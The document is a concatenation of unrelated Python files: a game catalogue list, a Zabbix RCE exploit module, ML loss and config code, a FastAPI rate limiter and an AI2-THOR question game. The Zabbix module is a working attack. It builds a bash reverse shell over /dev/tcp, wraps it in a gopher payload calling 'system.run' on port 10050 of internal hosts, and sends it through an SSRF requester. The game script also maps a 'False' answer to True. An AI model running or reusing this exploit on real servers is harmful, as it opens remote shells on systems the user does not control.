{ 'desc': 'The "rail fence" cipher for encrypting text.\n'
'More info at: https://en.wikipedia.org/wiki/Rail_fence_cipher\n'
'Tags: large, cryptography\n',
'filename': 'railfencecipher.py',
'hash': 436400985,
'name': 'Rail Fence Cipher'},
{ 'desc': 'Shows a simple rainbow animation. Press Ctrl-C to stop.\n'
'Tags: tiny, artistic, bext, beginner, scrolling\n',
'filename': 'rainbow1.py',
'hash': 735302012,
'name': 'Rainbow 1'},
{ 'desc': 'Shows a simple squiggle rainbow animation. Press Ctrl-C to stop.\n'
'Tags: tiny, artistic, bext, beginner, scrolling\n',
'filename': 'rainbow2.py',
'hash': 2007669186,
'name': 'Rainbow 2'},
{ 'desc': 'A tile flipping game, also called reversi.\n'
'More info https://en.wikipedia.org/wiki/Reversi\n'
'Tags: large, board game, game, two-player\n',
'filename': 'reversegam.py',
'hash': 950769813,
'name': 'Reversegam'},
{ 'desc': 'The classic hand game of luck.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, game\n',
'filename': 'rockpaperscissors.py',
'hash': 2003894144,
'name': '"""Rock, Paper, Scissors, by <NAME> <EMAIL>\n'},
{ 'desc': 'By <NAME> <EMAIL>\n'
'The classic hand game of luck, except you always win.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, game, humor\n',
'filename': 'rockpaperscissorsalwayswin.py',
'hash': 1707469529,
'name': '"""Rock,Paper, Scissors (Always Win version)\n'},
{ 'desc': 'The simplest shift cipher for encrypting and decrypting text.\n'
'More info at https://en.wikipedia.org/wiki/ROT13\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, cryptography\n',
'filename': 'rot13cipher.py',
'hash': 1506880261,
'name': 'ROT13 Cipher'},
{ 'desc': 'A rotating cube animation. Press Ctrl-C to stop.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, artistic, math\n',
'filename': 'rotatingcube.py',
'hash': 2438944116,
'name': 'Rotating Cube'},
{ 'desc': 'A 5,000 year old board game from Mesopotamia. Two players knock each\n'
'other back as they race for the goal.\n'
'More info https://en.wikipedia.org/wiki/Royal_Game_of_Ur\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, board game, game, two-player\n'
'\n',
'filename': 'royalgameofur.py',
'hash': 1057277339,
'name': 'The Royal Game of Ur'},
{ 'desc': 'A seven-segment number display module, used by the Countdown and Digital\n'
'Clock programs.\n'
'More info at https://en.wikipedia.org/wiki/Seven-segment_display\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, module\n',
'filename': 'sevseg.py',
'hash': 947695313,
'name': 'Sevseg'},
{ 'desc': 'A random gambling game to find the diamond under one of three shells.\nTags: tiny, beginner, game\n',
'filename': 'shellgame.py',
'hash': 705491737,
'name': 'Shell Game'},
{ 'desc': 'Displays a tessellation of the carpet pattern from The Shining.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, artistic\n',
'filename': 'shiningcarpet.py',
'hash': 1607388214,
'name': 'Shining Carpet'},
{ 'desc': 'A simple substitution cipher has a one-to-one translation for each\n'
'symbol in the plaintext and each symbol in the ciphertext.\n'
'More info at: https://en.wikipedia.org/wiki/Substitution_cipher\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, cryptography, math\n',
'filename': 'simplesubcipher.py',
'hash': 1406484596,
'name': 'Simple Substitution Cipher'},
{ 'desc': 'Create a sine-wavy message.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, artistic\n',
'filename': 'sinemessage.py',
'hash': 2811666296,
'name': 'Sine Message'},
{ 'desc': 'Slide the numbered tiles into the correct order.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, puzzle\n',
'filename': 'slidingtilepuzzle.py',
'hash': 2858053130,
'name': 'Sliding Tile Puzzle'},
{ 'desc': 'A screensaver of multicolor snakes moving around.\n'
'NOTE: Do not resize the terminal window while this program is running.\n'
'Tags: large, artistic, bext, object-oriented, simulation\n',
'filename': 'slitheringsnakes.py',
'hash': 3690444858,
'name': 'Slithering Snakes animation'},
{ 'desc': 'Fast-paced snail racing action!\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, artistic, beginner, game, multiplayer\n',
'filename': 'snailrace.py',
'hash': 1006720587,
'name': 'Snail Race'},
{ 'desc': 'The classic crate-pushing game originally by <NAME>\n'
'More info at: https://en.wikipedia.org/wiki/Sokoban\n'
'Tags: large, game, puzzle\n',
'filename': 'sokoban.py',
'hash': 2790913773,
'name': 'Sokoban Crate Pushing Game'},
{ 'desc': 'A simulation of a Japanese abacus calculator tool.\n'
'More info at: https://en.wikipedia.org/wiki/Soroban\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, artistic, math, simulation\n',
'filename': 'soroban.py',
'hash': 227252369,
'name': 'Soroban Japanese Abacus'},
{ 'desc': 'A pattern-matching game with sounds. Try to memorize an increasingly\n'
'longer and longer pattern of letters. Inspired by the electronic game,\n'
'Simon.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, beginner, game\n',
'filename': 'soundmimic.py',
'hash': 3991973973,
'name': 'Sound Mimic'},
{ 'desc': 'Translates English messages into sPOnGEtExT.\nTags: tiny, beginner, word\n',
'filename': 'spongetext.py',
'hash': 856597602,
'name': 'sPoNgEcAsE'},
{ 'desc': 'The classic 9x9 number placement puzzle.\n'
'More info at https://en.wikipedia.org/wiki/Sudoku\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, object-oriented, puzzle\n',
'filename': 'sudoku.py',
'hash': 724733092,
'name': 'Sudoku Puzzle'},
{ 'desc': 'An example program using the text-to-speech features of the pyttsx3\n'
'module.\n'
'View this code at https://nostarch.com/big-book-small-python-projects\n'
'Tags: tiny, beginner\n',
'filename': 'texttospeechtalker.py',
'hash': 3192030728,
'name': 'Text To Speech Talker'},
{ 'desc': 'Find the Queen of Hearts after cards have been swapped around.\n'
'(In the real-life version, the scammer palms the Queen of Hearts so you\n'
'always lose.)\n'
'More info at https://en.wikipedia.org/wiki/Three-card_Monte\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, card game, game\n',
'filename': 'threecardmonte.py',
'hash': 2721144305,
'name': 'Three-Card Monte'},
{ 'desc': 'The classic board game.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, board game, game, two-player\n',
'filename': 'tictactoe.py',
'hash': 29561780,
'name': 'Tic-Tac-Toe'},
{ 'desc': 'The classic board game. (Object-oriented programming version.)\n'
'Tags: large, board game, game, object-oriented, two-player\n',
'filename': 'tictactoeoop.py',
'hash': 391013425,
'name': 'Tic-Tac-Toe (OOP)'},
{ 'desc': 'A stack-moving puzzle game.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, game, puzzle\n',
'filename': 'towerofhanoi.py',
'hash': 3547311204,
'name': 'The Tower of Hanoi'},
{ 'desc': 'A quiz of several trick questions.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, humor\n',
'filename': 'trickquestions.py',
'hash': 1555410789,
'name': 'Trick Questions'},
{ 'desc': '\n'
'This runs the turtledemo module that comes with Python, which contains\n'
"many example programs that use the Python's turtle module.\n"
'Tags: tiny, artistic\n',
'filename': 'turtledemowrapper.py',
'hash': 2442229216,
'name': 'Turtle Demo Wrapper'},
{ 'desc': 'A sliding tile game to combine exponentially-increasing numbers.\n'
"Inspired by <NAME>'s 2048, which is a clone of Veewo Studios'\n"
'1024, which in turn is a clone of the Threes! game.\n'
'More info at https://en.wikipedia.org/wiki/2048_(video_game)\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, puzzle\n',
'filename': 'twentyfortyeight.py',
'hash': 2427271091,
'name': 'Twenty Forty-Eight'},
{ 'desc': 'Instead of a board with 9 spaces, this game has 9 boards with 81 spaces,\n'
'the winner of each board placing their X or O on the big board!\n'
'More info at: https://en.wikipedia.org/wiki/Ultimate_tic-tac-toe\n'
'Tags: large, board game, game, two-player\n',
'filename': 'ultimatetictactoe.py',
'hash': 1474091896,
'name': 'Ultimate Tic-Tac-Toe'},
{ 'desc': 'The Vigenère cipher is a polyalphabetic substitution cipher that was\n'
'powerful enough to remain unbroken for centuries.\n'
'More info at: https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, cryptography, math\n',
'filename': 'vigenerecipher.py',
'hash': 2001579518,
'name': 'Vigenère Cipher'},
{ 'desc': 'A water pouring puzzle.\n'
'More info: https://en.wikipedia.org/wiki/Water_pouring_puzzle\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, math, puzzle\n',
'filename': 'waterbucket.py',
'hash': 4026463542,
'name': 'Water Bucket Puzzle'},
{ 'desc': '\n(Requires Pygame) Play against the computer and try to flip their tiles.\n',
'filename': 'pygame_games/flippy.py',
'hash': 3713351773,
'name': 'Flippy (a Reversi clone)'},
{ 'desc': '\n(Requires Pygame) Play against the computer, dropping tiles to connect four.\n',
'filename': 'pygame_games/fourinarow.py',
'hash': 530766230,
'name': 'Four-In-A-Row'},
{ 'desc': '\n(Requires Pygame) An addictive jewel matching game.\n',
'filename': 'pygame_games/gemgem.py',
'hash': 3403778852,
'name': 'Gemgem (a Bejeweled clone)'},
{ 'desc': '\n(Requires Pygame) Try to make the entire field a single color.\n',
'filename': 'pygame_games/inkspill.py',
'hash': 1212986240,
'name': 'Ink Spill (a Flood It clone)'},
{ 'desc': '\n(Requires Pygame) A simple memory matching game.\n',
'filename': 'pygame_games/memorypuzzle.py',
'hash': 2764951721,
'name': 'Memory Puzzle'},
{ 'desc': '\n(Requires Pygame) Like Pygame, except with 5-box blocks.\n',
'filename': 'pygame_games/pentomino.py',
'hash': 2488726696,
'name': 'Pentomino'},
{ 'desc': '\n(Requires Pygame) Copy the pattern of flashing lights for as long as possible.\n',
'filename': 'pygame_games/simulate.py',
'hash': 1595074871,
'name': 'Simulate (a Simon clone)'},
{ 'desc': '\n(Requires Pygame) The classic 15-tile slide puzzle.\n',
'filename': 'pygame_games/slidepuzzle.py',
'hash': 2239300442,
'name': 'Slide Puzzle'},
{ 'desc': '\n(Requires Pygame) A game where squirrels eat each other and grow monstrously large.\n',
'filename': 'pygame_games/squirrel.py',
'hash': 3066255054,
'name': 'Squirrel Eat Squirrel'},
{ 'desc': '\n(Requires Pygame) A puzzle game where you push the stars over their goals.\n',
'filename': 'pygame_games/starpusher.py',
'hash': 869642124,
'name': 'Star Pusher (a Sokoban clone)'},
{ 'desc': '\n(Requires Pygame) The classic block falling puzzle from the Soviet Union.\n',
'filename': 'pygame_games/tetromino.py',
'hash': 2002643604,
'name': 'Tetromino (a Tetris clone)'},
{ 'desc': '\n(Requires Pygame) Tetris, but... simpler.\n',
'filename': 'pygame_games/tetrominoforidiots.py',
'hash': 96477611,
'name': 'Tetromino for Idiots'},
{ 'desc': '\n(Requires Pygame) Lead the green snake around the screen eating red apples.\n',
'filename': 'pygame_games/wormy.py',
'hash': 4058946360,
'name': 'Wormy'}]
SUPPORT_FILES = { 'alphabetizewordquiz.py': ['commonenglishwords.txt'],
'hamsburger.py': ['nounlist.txt'],
'mazerunner2d.py': ['maze11x11s1.txt', 'maze51x17s42.txt'],
'periodictable.py': ['periodictable.csv'],
'pygame_games/flippy.py': [ 'pygame_games',
'pygame_games/freesansbold.ttf',
'pygame_games/flippyboard.png',
'pygame_games/flippybackground.png'],
'pygame_games/fourinarow.py': [ 'pygame_games/4row_red.png',
'pygame_games/4row_black.png',
'pygame_games/4row_humanwinner.png',
'pygame_games/4row_computerwinner.png',
'pygame_games/4row_tie.png',
'pygame_games/4row_arrow.png'],
'pygame_games/gemgem.py': [ 'pygame_games/freesansbold.ttf',
'pygame_games/badswap.wav',
'pygame_games/match0.wav',
'pygame_games/match1.wav',
'pygame_games/match2.wav',
'pygame_games/match3.wav',
'pygame_games/match4.wav',
'pygame_games/match5.wav',
'pygame_games/gem1.png',
'pygame_games/gem2.png',
'pygame_games/gem3.png',
'pygame_games/gem4.png',
'pygame_games/gem5.png',
'pygame_games/gem6.png',
'pygame_games/gem7.png'],
'pygame_games/inkspill.py': [ 'pygame_games/inkspilllogo.png',
'pygame_games/inkspillspot.png',
'pygame_games/inkspillsettings.png',
'pygame_games/inkspillsettingsbutton.png',
'pygame_games/inkspillresetbutton.png'],
'pygame_games/pentomino.py': [ 'pygame_games/freesansbold.ttf',
'pygame_games/tetrisb.mid',
'pygame_games/tetrisc.mid'],
'pygame_games/simulate.py': [ 'pygame_games/freesansbold.ttf',
'pygame_games/beep1.ogg',
'pygame_games/beep2.ogg',
'pygame_games/beep3.ogg',
'pygame_games/beep4.ogg'],
'pygame_games/slidepuzzle.py': ['pygame_games/freesansbold.ttf'],
'pygame_games/squirrel.py': [ 'pygame_games/freesansbold.ttf',
'pygame_games/gameicon.png',
'pygame_games/squirrel.png',
'pygame_games/grass1.png',
'pygame_games/grass2.png',
'pygame_games/grass3.png',
'pygame_games/grass4.png'],
'pygame_games/starpusher.py': [ 'pygame_games/RedSelector.png',
'pygame_games/Selector.png',
'pygame_games/Star.png',
'pygame_games/Wall_Block_Tall.png',
'pygame_games/Wood_Block_Tall.png',
'pygame_games/Plain_Block.png',
'pygame_games/Grass_Block.png',
'pygame_games/star_title.png',
'pygame_games/star_solved.png',
'pygame_games/princess.png',
'pygame_games/boy.png',
'pygame_games/catgirl.png',
'pygame_games/horngirl.png',
'pygame_games/pinkgirl.png',
'pygame_games/Rock.png',
'pygame_games/Tree_Short.png',
'pygame_games/Tree_Tall.png',
'pygame_games/Tree_Ugly.png',
'pygame_games/starPusherLevels.txt'],
'pygame_games/tetromino.py': [ 'pygame_games/freesansbold.ttf',
'pygame_games/tetrisb.mid',
'pygame_games/tetrisc.mid'],
'pygame_games/tetrominoforidiots.py': [ 'pygame_games/freesansbold.ttf',
'pygame_games/tetrisb.mid',
'pygame_games/tetrisc.mid'],
'pygame_games/wormy.py': ['pygame_games/freesansbold.ttf'],
'rushhour.py': ['rushhourpuzzles.txt'],
'sokoban.py': ['sokobanlevels.txt'],
'sudoku.py': ['sudokupuzzles.txt']}
|
469818
|
from core.utils import *
import logging
import urllib.parse as urllib
# NOTE
# Require `EnableRemoteCommands = 1` on the Zabbix service
name = "zabbix"
description = "Zabbix RCE"
author = "Swissky"
documentation = []
class exploit():
cmd = "bash -i >& /dev/tcp/SERVER_HOST/SERVER_PORT 0>&1"
def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name))
cmd = input("Give command to execute (Enter for Reverse Shell): ")
if cmd == "":
if args.lhost == None:
self.cmd = self.cmd.replace("SERVER_HOST", input("Server Host:"))
else:
self.cmd = self.cmd.replace("SERVER_HOST", args.lhost)
if args.lport == None:
self.cmd = self.cmd.replace("SERVER_PORT", input("Server Port:"))
else:
self.cmd = self.cmd.replace("SERVER_PORT", args.lport)
else:
self.cmd = cmd
# Data for the service
gen_host = gen_ip_list("127.0.0.1", args.level)
for ip in gen_host:
port = "10050"
self.cmd = urllib.quote_plus(self.cmd).replace("+","%20")
self.cmd = self.cmd.replace("%2F","/")
self.cmd = self.cmd.replace("%25","%")
self.cmd = self.cmd.replace("%3A",":")
data = "system.run[(" + self.cmd + ");sleep 2s]"
payload = wrapper_gopher(data, ip , port)
logging.info("Generated payload : {}".format(payload))
# Send the payload
r = requester.do_request(args.param, payload)
|
469851
|
import logging
from typing import Type, Union
from modelforge.model import Model
from modelforge.storage_backend import StorageBackend
__models__ = set()
def register_model(cls: Type[Model]):
"""
Include the given model class into the registry.
:param cls: The class of the registered model.
:return: None
"""
if not issubclass(cls, Model):
raise TypeError("model bust be a subclass of Model")
if issubclass(cls, GenericModel):
raise TypeError("model must not be a subclass of GenericModel")
__models__.add(cls)
return cls
class GenericModel(Model):
"""
Compatible with any model: loads it in :func:`__init__`.
"""
NAME = Model.GENERIC_NAME
VENDOR = "modelforge"
DESCRIPTION = "does not matter"
def __init__(self, source: Union[str, "Model"]=None, dummy=False, cache_dir: str=None,
backend: StorageBackend=None, **kwargs):
"""
Initialize a new `GenericModel`.
:param source: UUID, file system path, file object or an URL; None means auto.
:param dummy: if True, ignore unknown model types.
:param cache_dir: The directory where to store the downloaded model.
:param backend: Remote storage backend to use if ``source`` is a UUID or a URL.
:param kwargs: Everything is passed directly to `Model.__init__`.
"""
super().__init__(**kwargs)
self._models = {m.NAME: m for m in __models__} if not dummy else {}
self.load(source=source, cache_dir=cache_dir, backend=backend)
def _load_tree(self, tree):
model = self._models.get(self.meta["model"])
if model is None:
if self._models:
raise ValueError("Unknown model: %s" % self.meta["model"])
return
# we overwrite our class - shady, but works
delattr(self, "_models")
self.__class__ = model
log_level = self._log.level
self._log = logging.getLogger(self.NAME)
self._log.setLevel(log_level)
self._load_tree(tree)
|
469938
|
from eventsourcing.infrastructure.event_sourced_repo import EventSourcedRepository
from quantdsl.domain.model.market_simulation import MarketSimulation, MarketSimulationRepository
class MarketSimulationRepo(MarketSimulationRepository, EventSourcedRepository):
domain_class = MarketSimulation
|
469960
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
class TripletLossFilter(nn.Module):
"""Triplet loss with hard positive/negative mining.
Reference:
Hermans et al. In Defense of the Triplet Loss for Person Re-Identification. arXiv:1703.07737.
Code imported from https://github.com/Cysu/open-reid/blob/master/reid/loss/triplet.py.
Args:
margin (float): margin for triplet.
"""
def __init__(self, margin=0.3):
super(TripletLossFilter, self).__init__()
self.margin = margin
self.ranking_loss = nn.MarginRankingLoss(margin=margin)
def forward(self, inputs, targets):
"""
Does not calculate noise inputs with label -1
Args:
inputs: feature matrix with shape (batch_size, feat_dim)
targets: ground truth labels with shape (num_classes)
"""
#print(inputs.shape, targets.shape)
inputs_new = []
targets_new = []
targets_value = []
for i in range(len(targets)):
if targets[i] == -1:
continue
else:
inputs_new.append(inputs[i])
targets_new.append(targets[i])
targets_value.append(targets[i].cpu().numpy().item())
if len(set(targets_value)) < 2:
tmp_loss = torch.zeros(1)
tmp_loss = tmp_loss[0]
tmp_loss = tmp_loss.to(targets.device)
return tmp_loss
#print(targets_value)
inputs_new = torch.stack(inputs_new)
targets_new = torch.stack(targets_new)
#print(inputs_new.shape, targets_new.shape)
n = inputs_new.size(0)
# Compute pairwise distance, replace by the official when merged
dist = torch.pow(inputs_new, 2).sum(dim=1, keepdim=True).expand(n, n)
dist = dist + dist.t()
dist.addmm_(1, -2, inputs_new, inputs_new.t())
dist = dist.clamp(min=1e-12).sqrt() # for numerical stability
#print("Triplet ", dist)
# For each anchor, find the hardest positive and negative
mask = targets_new.expand(n, n).eq(targets_new.expand(n, n).t())
#print(mask)
dist_ap, dist_an = [], []
for i in range(n):
dist_ap.append(dist[i][mask[i]].max())
dist_an.append(dist[i][mask[i] == 0].min())
#dist_ap = torch.cat(dist_ap)
#dist_an = torch.cat(dist_an)
dist_ap = torch.stack(dist_ap)
dist_an = torch.stack(dist_an)
# Compute ranking hinge loss
y = torch.ones_like(dist_an)
#y = dist_an.data.new()
#y.resize_as_(dist_an.data)
#y.fill_(1)
#y = Variable(y)
loss = self.ranking_loss(dist_an, dist_ap, y)
return loss
|
469977
|
import logging
from fastapi import HTTPException, Depends, Request
from contextlib import contextmanager
from redis import RedisError
from redis_rate_limit import RateLimiter, TooManyRequests
from idunn.utils.redis import get_redis_pool, RedisNotConfigured
from idunn import settings
logger = logging.getLogger(__name__)
TooManyRequestsException = TooManyRequests
@contextmanager
def dummy_limit():
yield
class IdunnRateLimiter:
def __init__(self, resource, max_requests, expire):
self.resource = resource
self.max_requests = max_requests
self.expire = expire
self._init_limiter()
def _init_limiter(self):
try:
redis_pool = get_redis_pool(db=settings["RATE_LIMITER_REDIS_DB"])
except RedisNotConfigured:
logger.warning("Redis URL not configured: rate limiter not started")
self._limiter = None
else:
# If a redis is configured, then we use the corresponding redis service in the rate
# limiter.
self._limiter = RateLimiter(
resource=self.resource,
max_requests=self.max_requests,
expire=self.expire,
redis_pool=redis_pool,
)
def limit(self, client, ignore_redis_error=False):
if self._limiter is None:
return dummy_limit()
@contextmanager
def limit():
try:
with self._limiter.limit(client):
yield
except RedisError:
if ignore_redis_error:
logger.warning(
"Ignoring RedisError in rate limiter for %s",
self._limiter.resource,
exc_info=True,
)
yield
else:
raise
return limit()
def check_limit_per_client(self, request):
client_id = request.headers.get("x-client-hash") or "default"
try:
with self.limit(client=client_id, ignore_redis_error=True):
pass
except TooManyRequestsException as exc:
raise HTTPException(status_code=429, detail="Too Many Requests") from exc
def rate_limiter_dependency(**kwargs):
rate_limiter = IdunnRateLimiter(**kwargs)
def dependency(request: Request):
rate_limiter.check_limit_per_client(request)
return Depends(dependency)
|
470024
|
import pdb
import cv2
import numpy as np
import random
import os
from utils import game_util
from utils import drawing
import constants
class PersonGameState(object):
def __init__(self):
self.env = game_util.create_env()
self.env.step({'action': 'Initialize', 'gridSize': constants.AGENT_STEP_SIZE})
self.local_random = random.Random()
self.question_types = ['existence', 'counting', 'contains']
self.datasets = []
self.test_datasets = []
self.num_steps = 0
self.num_failed_steps = 0
for (qq, question_type) in enumerate(self.question_types):
data_file = os.path.join('questions', 'train', 'data' + '_' + question_type, 'combined.csv')
if qq in constants.USED_QUESTION_TYPES:
dataset = [line.strip().split(',') for line in open(data_file)][1:]
self.datasets.append(dataset)
print('Type', question_type, 'num_questions', len(self.datasets[-1]))
else:
self.datasets.append([])
# test data
data_file = os.path.join('questions', constants.TEST_SET, 'data' + '_' + question_type, 'combined.csv')
if qq in constants.USED_QUESTION_TYPES:
dataset = [line.strip().split(',') for line in open(data_file)][1:]
self.test_datasets.append(dataset)
print('Type', question_type, 'num_questions', len(self.test_datasets[-1]))
else:
self.test_datasets.append([])
def reset(self, seed=None, test_ind=None):
if seed is not None:
self.local_random.seed(seed)
question_row, question_type_ind = test_ind
question_type = self.question_types[question_type_ind]
question_data = self.test_datasets[question_type_ind][question_row % len(self.test_datasets[question_type_ind])]
scene_num, scene_seed, question_str, answer = question_data[1:5]
self.scene_seed = int(scene_seed)
self.scene_num = int(scene_num)
self.question_str = question_str
self.question_type_ind = question_type_ind
self.scene_name = 'FloorPlan%d' % self.scene_num
grid_file = 'layouts/%s-layout.npy' % self.scene_name
self.points = (np.load(grid_file) * 1.0 / constants.AGENT_STEP_SIZE).astype(int)
max_num_repeats = 1
remove_prob = 0.5
if question_type == 'existence':
max_num_repeats = 10
remove_prob = 0.25
elif question_type == 'counting':
max_num_repeats = constants.MAX_COUNTING_ANSWER + 1
remove_prob = 0.5
elif question_type == 'contains':
max_num_repeats = 10
remove_prob = 0.25
self.event = game_util.reset(self.env, self.scene_name,
render_image=True,
render_depth_image=True,
render_class_image=True,
render_object_image=True)
self.agent_height = self.event.metadata['agent']['position']['y']
self.event = self.env.random_initialize(self.scene_seed, max_num_repeats=max_num_repeats, remove_prob=remove_prob)
print('Question: %s' % self.question_str)
if answer == 'True':
self.answer = True
elif answer == 'False':
self.answer = True
else:
self.answer = int(answer)
start_point = self.local_random.randint(0, self.points.shape[0] - 1)
start_point = self.points[start_point, :].copy()
self.start_point = (start_point[0], start_point[1], self.local_random.randint(0, 3))
action = {'action': 'TeleportFull',
'x': self.start_point[0] * constants.AGENT_STEP_SIZE,
'y': self.agent_height,
'z': self.start_point[1] * constants.AGENT_STEP_SIZE,
'rotateOnTeleport': True,
'rotation': self.start_point[2] * 90,
'horizon': 30,
}
self.event = self.env.step(action)
self.process_frame()
def step(self, action_key):
action = None
if action_key == 'w':
action = {'action': 'MoveAhead'}
elif action_key == 'a':
action = {'action': 'RotateLeft'}
elif action_key == 's':
action = {'action': 'RotateRight'}
elif action_key == 'o':
action = {'action': 'OpenObject'}
elif action_key == 'c':
action = {'action': 'CloseObject'}
elif action_key == '+':
action = {'action': 'LookUp'}
elif action_key == '-':
action = {'action': 'LookDown'}
elif action_key == 'answer':
pass
elif action_key == 'q':
quit()
elif action_key == 'dd':
import pdb
pdb.set_trace()
print('debug entered')
else:
return
self.num_steps += 1
if action is not None:
if action['action'] in {'OpenObject', 'CloseObject'}:
action = game_util.set_open_close_object(action, self.event)
self.event = self.env.step(action)
if not self.event.metadata['lastActionSuccess']:
self.num_failed_steps += 1
self.process_frame()
def process_frame(self):
self.pose = self.event.pose
self.s_t = self.event.frame
self.detection_image = self.s_t.copy()
self.s_t_depth = self.event.depth_frame
boxes = []
scores = []
class_names = []
for k,v in self.event.class_detections2D.items():
if k in constants.OBJECTS_SET:
boxes.extend(v)
scores.extend([1] * len(v))
class_names.extend([k] * len(v))
detected_objects = [game_util.get_object(obj_id, self.event.metadata) for obj_id in self.event.instance_detections2D.keys()]
detected_objects = [obj for obj in detected_objects if obj is not None]
boxes = np.array([self.event.instance_detections2D[obj['objectId']] for obj in detected_objects])
class_names = np.array([obj['objectType'] for obj in detected_objects])
scores = np.ones(len(boxes))
self.detection_image = drawing.visualize_detections(
self.event.frame, boxes, class_names, scores)
print(self.question_str)
if __name__ == '__main__':
state = PersonGameState()
random.seed(0)
for question_type in constants.USED_QUESTION_TYPES:
print('Starting question type', question_type)
num_correct = 0
num_total = 0
questions = []
for test_ep in range(10):
questions.append((test_ep, (random.randint(0, 2**31), question_type)))
random.shuffle(questions)
for (qq, question) in enumerate(questions):
num_total += 1
action_key = ''
state.reset(*question)
while action_key != 'answer':
if constants.DEBUG:
images = [
state.s_t,
state.detection_image,
state.s_t_depth,
state.event.class_segmentation_frame,
state.event.instance_segmentation_frame]
titles = ['state', 'detections', 'depth', 'class segmentation', 'instance segmentation']
image = drawing.subplot(images, 2, 3, constants.SCREEN_WIDTH, constants.SCREEN_HEIGHT, 5, titles)
cv2.imshow('image', image[:, :, ::-1])
cv2.waitKey(10)
print('w: MoveAhead\na: RotateLeft\ns: RotateRight\no: OpenObject\nc: CloseObject\n+: LookUp\n-: LookDown\nanswer: Open answer dialog. type {true, false, yes, no}\nq: quit\ndd: enter debug')
new_action_key = input(">> ")
if new_action_key != '':
action_key = new_action_key
state.step(action_key)
answer = None
while answer is None:
answer = input("answer: ").lower()
if answer in {'true', 'false', 'yes', 'no'}:
if ((answer in {'true', 'yes'} and state.answer) or
(answer in {'false', 'no'} and not state.answer)):
print('Correct')
num_correct += 1
else:
try:
answer = int(answer)
if answer == state.answer:
print('Correct')
num_correct += 1
except ValueError as ve:
answer = None
print('Num questions', num_total)
print('Correct percent: %.2f%%' % (num_correct * 100.0 / num_total))
print('Total moves:', state.num_steps)
print('Average moves:', (state.num_steps / (qq + 1)))
print('Invalid moves percent: %.2f%%' % (state.num_failed_steps * 100.0 / state.num_steps))
state.num_steps = 0
state.num_failed_steps = 0
|
470052
|
import copy
import json
import logging
from collections.abc import Mapping
from dataclasses import FrozenInstanceError, asdict, dataclass, field, is_dataclass, replace
from os.path import isfile
from typing import List, Optional, Union
from .adapter_utils import AdapterType, get_adapter_config_hash, resolve_adapter_config
logger = logging.getLogger(__name__)
@dataclass()
class InvertibleAdapterConfig(Mapping):
block_type: str
non_linearity: str
reduction_factor: int
# We want to emulate a simple form of immutability while keeping the ability to add custom attributes.
# Therefore, we don't allow changing attribute values if set once.
def __setattr__(self, name, value):
if name in self.__dict__:
raise FrozenInstanceError()
else:
object.__setattr__(self, name, value)
def __delattr__(self, name):
raise FrozenInstanceError()
def __getitem__(self, key):
return self.__dict__[key]
def __iter__(self):
return iter(self.__dict__)
def __len__(self):
return len(self.__dict__)
@dataclass
class AdapterConfig(Mapping):
"""Base class that models the architecture of an adapter."""
original_ln_before: bool
original_ln_after: bool
residual_before_ln: bool
adapter_residual_before_ln: bool
ln_before: bool
ln_after: bool
mh_adapter: bool
output_adapter: bool
non_linearity: str
reduction_factor: int
invertible_adapter: Optional[InvertibleAdapterConfig] = None
leave_out: List[int] = field(default_factory=list)
# We want to emulate a simple form of immutability while keeping the ability to add custom attributes.
# Therefore, we don't allow changing attribute values if set once.
def __setattr__(self, name, value):
if name in self.__dict__:
raise FrozenInstanceError()
else:
object.__setattr__(self, name, value)
def __delattr__(self, name):
raise FrozenInstanceError()
def __getitem__(self, key):
return self.__dict__[key]
def __iter__(self):
return iter(self.__dict__)
def __len__(self):
return len(self.__dict__)
def to_dict(self):
return asdict(self)
def replace(self, **changes):
return replace(self, **changes)
@classmethod
def from_dict(cls, config):
return cls(**config)
@classmethod
def load(cls, config: Union[dict, str], download_kwargs=None, **kwargs):
"""Loads a given adapter configuration specifier into a full AdapterConfig instance.
Args:
config (Union[dict, str]): The configuration to load. Can be either:
- a dictionary representing the full config
- an identifier string available in ADAPTER_CONFIG_MAP
- the path to a file containing a full adapter configuration
- an identifier string available in Adapter-Hub
Returns:
dict: The resolved adapter configuration dictionary.
"""
if not config:
return None
# if force_download is set, skip the local map
if download_kwargs and download_kwargs.get("force_download", False):
local_map = None
else:
local_map = ADAPTER_CONFIG_MAP
if download_kwargs:
config_dict = resolve_adapter_config(config, local_map=local_map, **download_kwargs)
else:
config_dict = resolve_adapter_config(config, local_map=local_map)
# convert back to dict to allow attr overrides
if isinstance(config_dict, AdapterConfig):
config_dict = config_dict.to_dict()
config_dict.update((k, v) for k, v in kwargs.items() if v is not None)
return AdapterConfig.from_dict(config_dict)
@dataclass
class PfeifferConfig(AdapterConfig):
"""
The adapter architecture proposed by Pfeiffer et. al., 2020.
Described in https://arxiv.org/pdf/2005.00247.pdf.
"""
original_ln_before: bool = True
original_ln_after: bool = True
residual_before_ln: bool = True
adapter_residual_before_ln: bool = False
ln_before: bool = False
ln_after: bool = False
